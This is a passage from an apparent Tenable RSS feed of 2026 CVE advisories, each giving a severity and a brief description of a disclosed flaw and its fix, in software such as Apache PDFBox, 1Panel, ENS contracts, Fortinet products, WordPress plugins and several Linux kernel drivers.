      <p>This issue affects the ExtractEmbeddedFiles example in Apache PDFBox: from 2.0.24 through 2.0.35, from 3.0.0 through 3.0.6. The ExtractEmbeddedFiles example contains a path traversal vulnerability (CWE-22) because the filename that is obtained from PDComplexFileSpecification.getFilename() is appended to the extraction path. Users who have copied this example into their production code should review it to ensure that the extraction path is acceptable. The example has been changed accordingly: the initial path and the extraction paths are now converted into canonical paths, and it is verified that the extraction path contains the initial path. The documentation has also been adjusted.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23907">https://www.tenable.com/cve/CVE-2026-23907</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23877]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23877</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23877</guid>
            <pubDate>Mon, 19 Jan 2026 21:15:52 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Swing Music is a self-hosted music player for local audio files. Prior to version 2.1.4, Swing Music's `list_folders()` function in the `/folder/dir-browser` endpoint is vulnerable to directory traversal attacks. Any authenticated user (including non-admin) can browse arbitrary directories on the server filesystem. Version 2.1.4 fixes the issue.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23877">https://www.tenable.com/cve/CVE-2026-23877</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23744]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23744</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23744</guid>
            <pubDate>Fri, 16 Jan 2026 20:15:51 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>MCPJam inspector is the local-first development platform for MCP servers. Versions 1.4.2 and earlier contain a remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request. Version 1.4.3 contains a patch.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23744">https://www.tenable.com/cve/CVE-2026-23744</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23674]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23674</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23674</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:16 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper resolution of path equivalence in Windows MapUrlToZone allows an unauthorized attacker to bypass a security feature over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23674">https://www.tenable.com/cve/CVE-2026-23674</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23673]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23673</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23673</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:16 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Out-of-bounds read in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23673">https://www.tenable.com/cve/CVE-2026-23673</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23672]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23672</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23672</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:15 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Windows Universal Disk Format File System Driver (UDFS) Elevation of Privilege Vulnerability</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23672">https://www.tenable.com/cve/CVE-2026-23672</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23671]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23671</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23671</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:15 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth RFCOM Protocol Driver allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23671">https://www.tenable.com/cve/CVE-2026-23671</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23669]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23669</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23669</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:15 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Use after free in Windows Print Spooler Components allows an authorized attacker to execute code over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23669">https://www.tenable.com/cve/CVE-2026-23669</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23654]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23654</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23654</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:13 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Dependency on vulnerable third-party component in GitHub Repo: zero-shot-scfoundation allows an unauthorized attacker to execute code over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23654">https://www.tenable.com/cve/CVE-2026-23654</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23525]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23525</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23525</guid>
            <pubDate>Sun, 18 Jan 2026 23:15:48 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>1Panel is an open-source, web-based control panel for Linux server management. A stored Cross-Site Scripting (XSS) vulnerability exists in the 1Panel App Store when viewing application details. Malicious scripts can execute in the context of the user’s browser, potentially compromising session data or sensitive system interfaces. All versions of 1Panel up to and including v1.10.33-lts and v2.0.16 are affected. An attacker could publish a malicious application that, when loaded by users (locally or remotely), can execute arbitrary scripts. This may result in theft of user cookies, unauthorized access to system functions, or other actions that compromise the confidentiality, integrity, and availability of the system. The vulnerability is caused by insufficient sanitization of content rendered by the MdEditor component with the `previewOnly` attribute enabled. Specifically, the App Store renders application README content without proper XSS protection, allowing script execution during content rendering; and similar issues exist in system upgrade-related components, which can be fixed by implementing proper XSS sanitization in the MdEditor component. These vulnerabilities can be mitigated by applying proper XSS protection and sanitization when rendering content in the MdEditor component. Safe versions with a patch incorporated are v1.10.34-lts and v2.0.17.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23525">https://www.tenable.com/cve/CVE-2026-23525</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23490]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23490</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23490</guid>
            <pubDate>Fri, 16 Jan 2026 19:16:19 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.2, a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets. This vulnerability is fixed in 0.6.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23490">https://www.tenable.com/cve/CVE-2026-23490</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23227]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23227</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23227</guid>
            <pubDate>Wed, 18 Feb 2026 16:22:32 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>In the Linux kernel, the following vulnerability has been resolved: drm/exynos: vidi: use ctx->lock to protect struct vidi_context member variables related to memory alloc/free. The Exynos Virtual Display driver performs memory alloc/free operations without lock protection, which easily causes concurrency problems. For example, a use-after-free can occur in a race scenario like this:</p>
      <pre>
CPU0                              CPU1                                        CPU2
----                              ----                                        ----
vidi_connection_ioctl()
  if (vidi->connection) // true
    drm_edid = drm_edid_alloc(); // alloc drm_edid
    ...
    ctx->raw_edid = drm_edid;
    ...
                                  drm_mode_getconnector()
                                    drm_helper_probe_single_connector_modes()
                                      vidi_get_modes()
                                        if (ctx->raw_edid) // true
                                          drm_edid_dup(ctx->raw_edid);
                                            if (!drm_edid) // false
                                            ...
                                                                              vidi_connection_ioctl()
                                                                                if (vidi->connection) // false
                                                                                  drm_edid_free(ctx->raw_edid); // free drm_edid
                                                                                  ...
                                            drm_edid_alloc(drm_edid->edid)
                                              kmemdup(edid); // UAF!!
                                              ...
      </pre>
      <p>To prevent these vulnerabilities, at least in vidi_context, member variables related to memory alloc/free should be protected with ctx->lock.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23227">https://www.tenable.com/cve/CVE-2026-23227</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23226]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23226</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23226</guid>
            <pubDate>Wed, 18 Feb 2026 16:22:32 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>In the Linux kernel, the following vulnerability has been resolved: ksmbd: add chann_lock to protect ksmbd_chann_list xarray ksmbd_chann_list xarray lacks synchronization, allowing use-after-free in multi-channel sessions (between lookup_chann_list() and ksmbd_chann_del). Adds rw_semaphore chann_lock to struct ksmbd_session and protects all xa_load/xa_store/xa_erase accesses.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23226">https://www.tenable.com/cve/CVE-2026-23226</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23069]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23069</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23069</guid>
            <pubDate>Wed, 04 Feb 2026 17:16:17 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>In the Linux kernel, the following vulnerability has been resolved: vsock/virtio: fix potential underflow in virtio_transport_get_credit() The credit calculation in virtio_transport_get_credit() uses unsigned arithmetic: ret = vvs->peer_buf_alloc - (vvs->tx_cnt - vvs->peer_fwd_cnt); If the peer shrinks its advertised buffer (peer_buf_alloc) while bytes are in flight, the subtraction can underflow and produce a large positive value, potentially allowing more data to be queued than the peer can handle. Reuse virtio_transport_has_space() which already handles this case and add a comment to make it clear why we are doing that. [Stefano: use virtio_transport_has_space() instead of duplicating the code] [Stefano: tweak the commit message]</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23069">https://www.tenable.com/cve/CVE-2026-23069</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23068]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23068</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23068</guid>
            <pubDate>Wed, 04 Feb 2026 17:16:17 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>In the Linux kernel, the following vulnerability has been resolved: spi: spi-sprd-adi: Fix double free in probe error path The driver currently uses spi_alloc_host() to allocate the controller but registers it using devm_spi_register_controller(). If devm_register_restart_handler() fails, the code jumps to the put_ctlr label and calls spi_controller_put(). However, since the controller was registered via a devm function, the device core will automatically call spi_controller_put() again when the probe fails. This results in a double-free of the spi_controller structure. Fix this by switching to devm_spi_alloc_host() and removing the manual spi_controller_put() call.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23068">https://www.tenable.com/cve/CVE-2026-23068</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23067]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23067</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23067</guid>
            <pubDate>Wed, 04 Feb 2026 17:16:17 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>In the Linux kernel, the following vulnerability has been resolved: iommu/io-pgtable-arm: fix size_t signedness bug in unmap path __arm_lpae_unmap() returns size_t but was returning -ENOENT (negative error code) when encountering an unmapped PTE. Since size_t is unsigned, -ENOENT (typically -2) becomes a huge positive value (0xFFFFFFFFFFFFFFFE on 64-bit systems). This corrupted value propagates through the call chain: __arm_lpae_unmap() returns -ENOENT as size_t -> arm_lpae_unmap_pages() returns it -> __iommu_unmap() adds it to iova address -> iommu_pgsize() triggers BUG_ON due to corrupted iova This can cause IOVA address overflow in __iommu_unmap() loop and trigger BUG_ON in iommu_pgsize() from invalid address alignment. Fix by returning 0 instead of -ENOENT. The WARN_ON already signals the error condition, and returning 0 (meaning "nothing unmapped") is the correct semantic for size_t return type. This matches the behavior of other io-pgtable implementations (io-pgtable-arm-v7s, io-pgtable-dart) which return 0 on error conditions.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23067">https://www.tenable.com/cve/CVE-2026-23067</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23066]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23066</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23066</guid>
            <pubDate>Wed, 04 Feb 2026 17:16:17 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix recvmsg() unconditional requeue If rxrpc_recvmsg() fails because MSG_DONTWAIT was specified but the call at the front of the recvmsg queue already has its mutex locked, it requeues the call - whether or not the call is already queued. The call may be on the queue because MSG_PEEK was also passed and so the call was not dequeued or because the I/O thread requeued it. The unconditional requeue may then corrupt the recvmsg queue, leading to things like UAFs or refcount underruns. Fix this by only requeuing the call if it isn't already on the queue - and moving it to the front if it is already queued. If we don't queue it, we have to put the ref we obtained by dequeuing it. Also, MSG_PEEK doesn't dequeue the call so shouldn't call rxrpc_notify_socket() for the call if we didn't use up all the data on the queue, so fix that also.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23066">https://www.tenable.com/cve/CVE-2026-23066</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23065]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23065</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23065</guid>
            <pubDate>Wed, 04 Feb 2026 17:16:17 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>In the Linux kernel, the following vulnerability has been resolved: platform/x86/amd: Fix memory leak in wbrf_record() The tmp buffer is allocated using kcalloc() but is not freed if acpi_evaluate_dsm() fails. This causes a memory leak in the error path. Fix this by explicitly freeing the tmp buffer in the error handling path of acpi_evaluate_dsm().</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23065">https://www.tenable.com/cve/CVE-2026-23065</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23064]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23064</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23064</guid>
            <pubDate>Wed, 04 Feb 2026 17:16:17 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>In the Linux kernel, the following vulnerability has been resolved: net/sched: act_ife: avoid possible NULL deref. tcf_ife_encode() must make sure ife_encode() does not return NULL. syzbot reported:</p>
      <pre>
Oops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN NOPTI
KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]
RIP: 0010:ife_tlv_meta_encode+0x41/0xa0 net/ife/ife.c:166
CPU: 3 UID: 0 PID: 8990 Comm: syz.0.696 Not tainted syzkaller #0 PREEMPT(full)
Call Trace:
 &lt;TASK&gt;
 ife_encode_meta_u32+0x153/0x180 net/sched/act_ife.c:101
 tcf_ife_encode net/sched/act_ife.c:841 [inline]
 tcf_ife_act+0x1022/0x1de0 net/sched/act_ife.c:877
 tc_act include/net/tc_wrapper.h:130 [inline]
 tcf_action_exec+0x1c0/0xa20 net/sched/act_api.c:1152
 tcf_exts_exec include/net/pkt_cls.h:349 [inline]
 mall_classify+0x1a0/0x2a0 net/sched/cls_matchall.c:42
 tc_classify include/net/tc_wrapper.h:197 [inline]
 __tcf_classify net/sched/cls_api.c:1764 [inline]
 tcf_classify+0x7f2/0x1380 net/sched/cls_api.c:1860
 multiq_classify net/sched/sch_multiq.c:39 [inline]
 multiq_enqueue+0xe0/0x510 net/sched/sch_multiq.c:66
 dev_qdisc_enqueue+0x45/0x250 net/core/dev.c:4147
 __dev_xmit_skb net/core/dev.c:4262 [inline]
 __dev_queue_xmit+0x2998/0x46c0 net/core/dev.c:4798
      </pre>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23064">https://www.tenable.com/cve/CVE-2026-23064</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23063]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23063</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23063</guid>
            <pubDate>Wed, 04 Feb 2026 17:16:16 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>In the Linux kernel, the following vulnerability has been resolved: uacce: ensure safe queue release with state management. Directly calling `put_queue` carries risks since it cannot guarantee that the resources of `uacce_queue` have been fully released beforehand. So adding a `stop_queue` operation for the UACCE_CMD_PUT_Q command and leaving the `put_queue` operation to the final resource release ensures safety. Queue states are defined as follows:</p>
      <ul>
        <li>UACCE_Q_ZOMBIE: Initial state</li>
        <li>UACCE_Q_INIT: After opening `uacce`</li>
        <li>UACCE_Q_STARTED: After `start` is issued via `ioctl`</li>
      </ul>
      <p>When executing `poweroff -f` in virt while accelerators are still working, `uacce_fops_release` and `uacce_remove` may execute concurrently. This can cause `uacce_put_queue` within `uacce_fops_release` to access a NULL `ops` pointer. Therefore, add state checks to prevent accessing freed pointers.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23063">https://www.tenable.com/cve/CVE-2026-23063</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23062]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23062</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23062</guid>
            <pubDate>Wed, 04 Feb 2026 17:16:16 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>In the Linux kernel, the following vulnerability has been resolved: platform/x86: hp-bioscfg: Fix kernel panic in GET_INSTANCE_ID macro. The GET_INSTANCE_ID macro caused a kernel panic when accessing sysfs attributes, for two reasons:</p>
      <ol>
        <li>Off-by-one error: The loop condition used '&lt;=' instead of '&lt;', causing access beyond array bounds. Since array indices are 0-based and go from 0 to instances_count-1, the loop should use '&lt;'.</li>
        <li>Missing NULL check: The code dereferenced attr_name_kobj->name without checking if attr_name_kobj was NULL, causing a null pointer dereference in min_length_show() and other attribute show functions.</li>
      </ol>
      <p>The panic occurred when fwupd tried to read BIOS configuration attributes:</p>
      <pre>
Oops: general protection fault [#1] SMP KASAN NOPTI
KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]
RIP: 0010:min_length_show+0xcf/0x1d0 [hp_bioscfg]
      </pre>
      <p>Add a NULL check for attr_name_kobj before dereferencing and correct the loop boundary to match the pattern used elsewhere in the driver.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23062">https://www.tenable.com/cve/CVE-2026-23062</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23061]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23061</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23061</guid>
            <pubDate>Wed, 04 Feb 2026 17:16:16 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>In the Linux kernel, the following vulnerability has been resolved: can: kvaser_usb: kvaser_usb_read_bulk_callback(): fix URB memory leak Fix similar memory leak as in commit 7352e1d5932a ("can: gs_usb: gs_usb_receive_bulk_callback(): fix URB memory leak"). In kvaser_usb_set_{,data_}bittiming() -> kvaser_usb_setup_rx_urbs(), the URBs for USB-in transfers are allocated, added to the dev->rx_submitted anchor and submitted. In the complete callback kvaser_usb_read_bulk_callback(), the URBs are processed and resubmitted. In kvaser_usb_remove_interfaces() the URBs are freed by calling usb_kill_anchored_urbs(&dev->rx_submitted). However, this does not take into account that the USB framework unanchors the URB before the complete function is called. This means that once an in-URB has been completed, it is no longer anchored and is ultimately not released in usb_kill_anchored_urbs(). Fix the memory leak by anchoring the URB in the kvaser_usb_read_bulk_callback() to the dev->rx_submitted anchor.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23061">https://www.tenable.com/cve/CVE-2026-23061</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-23060]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-23060</link>
            <guid>https://www.tenable.com/cve/CVE-2026-23060</guid>
            <pubDate>Wed, 04 Feb 2026 17:16:16 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>In the Linux kernel, the following vulnerability has been resolved: crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec authencesn assumes an ESP/ESN-formatted AAD. When assoclen is shorter than the minimum expected length, crypto_authenc_esn_decrypt() can advance past the end of the destination scatterlist and trigger a NULL pointer dereference in scatterwalk_map_and_copy(), leading to a kernel panic (DoS). Add a minimum AAD length check to fail fast on invalid inputs.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-23060">https://www.tenable.com/cve/CVE-2026-23060</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22866]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22866</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22866</guid>
            <pubDate>Wed, 25 Feb 2026 16:23:25 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Ethereum Name Service (ENS) is a distributed, open, and extensible naming system based on the Ethereum blockchain. In versions 1.6.2 and prior, the `RSASHA256Algorithm` and `RSASHA1Algorithm` contracts fail to validate PKCS#1 v1.5 padding structure when verifying RSA signatures. The contracts only check if the last 32 (or 20) bytes of the decrypted signature match the expected hash. This enables Bleichenbacher's 2006 signature forgery attack against DNS zones using RSA keys with low public exponents (e=3). Two ENS-supported TLDs (.cc and .name) use e=3 for their Key Signing Keys, allowing any domain under these TLDs to be fraudulently claimed on ENS without DNS ownership. A patch was merged at commit c76c5ad0dc9de1c966443bd946fafc6351f87587. Possible workarounds include deploying the patched contracts and pointing DNSSECImpl.setAlgorithm to the deployed contract.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22866">https://www.tenable.com/cve/CVE-2026-22866</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22629]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22629</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22629</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:12 GMT</pubDate>
            <description><![CDATA[
      <p>Low Severity</p>

      <h3>Description</h3>
      <p>An improper restriction of excessive authentication attempts vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4 all versions, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer 6.4 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4 all versions, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiAnalyzer Cloud 6.4 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4 all versions, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager 6.4 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4 all versions, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions, FortiManager Cloud 6.4 all versions may allow an attacker to bypass brute-force protections via exploitation of race conditions. The latter raises the complexity of practical exploitation.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22629">https://www.tenable.com/cve/CVE-2026-22629</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22572]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22572</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22572</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:12 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>An authentication bypass using an alternate path or channel vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.3, FortiAnalyzer 7.4.0 through 7.4.7, FortiAnalyzer 7.2.2 through 7.2.11, FortiManager 7.6.0 through 7.6.3, FortiManager 7.4.0 through 7.4.7, FortiManager 7.2.2 through 7.2.11, FortiManager Cloud 7.6.0 through 7.6.3, FortiManager Cloud 7.4.0 through 7.4.7, FortiManager Cloud 7.2.2 through 7.2.10 may allow an attacker with knowledge of the admin's password to bypass multifactor authentication checks via submitting multiple crafted requests.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22572">https://www.tenable.com/cve/CVE-2026-22572</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-2257]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-2257</link>
            <guid>https://www.tenable.com/cve/CVE-2026-2257</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:33 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>The GetGenie plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.3.2 due to missing validation on a user controlled key in the `action` function. This makes it possible for authenticated attackers, with Author-level access and above, to update post metadata for arbitrary posts. Combined with a lack of input sanitization, this leads to Stored Cross-Site Scripting when a higher-privileged user (such as an Administrator) views the affected post's "Competitor" tab in the GetGenie sidebar.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-2257">https://www.tenable.com/cve/CVE-2026-2257</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-2229]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-2229</link>
            <guid>https://www.tenable.com/cve/CVE-2026-2229</guid>
            <pubDate>Thu, 12 Mar 2026 21:16:25 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Impact: The undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the server_max_window_bits parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range server_max_window_bits value (outside zlib's valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination. The vulnerability exists because:</p>
      <ul>
        <li>The isValidClientWindowBits() function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15</li>
        <li>The createInflateRaw() call is not wrapped in a try-catch block</li>
        <li>The resulting exception propagates up through the call stack and crashes the Node.js process</li>
      </ul>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-2229">https://www.tenable.com/cve/CVE-2026-2229</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22216]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22216</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22216</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:11 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>wpDiscuz before 7.6.47 contains a missing rate limiting vulnerability that allows unauthenticated attackers to subscribe arbitrary email addresses to post notifications by sending POST requests to the wpdAddSubscription handler in class.WpdiscuzHelperAjax.php. Attackers can exploit LIKE wildcard characters in the subscription query to match multiple email addresses and generate unwanted notification emails to victim accounts.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22216">https://www.tenable.com/cve/CVE-2026-22216</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22215]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22215</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22215</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:11 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>wpDiscuz before 7.6.47 contains a cross-site request forgery vulnerability in the getFollowsPage() function that allows attackers to trigger unauthorized actions without nonce validation. Attackers can craft malicious requests to enumerate follow relationships and manipulate user follow data by exploiting the missing CSRF protection in the follows page handler.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-22215">https://www.tenable.com/cve/CVE-2026-22215</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-22210]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-22210</link>
            <guid>https://www.tenable.com/cve/CVE-2026-22210</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:11 GMT</pubDate>
            <description><![CDATA[
      <p>Low Severity</p>

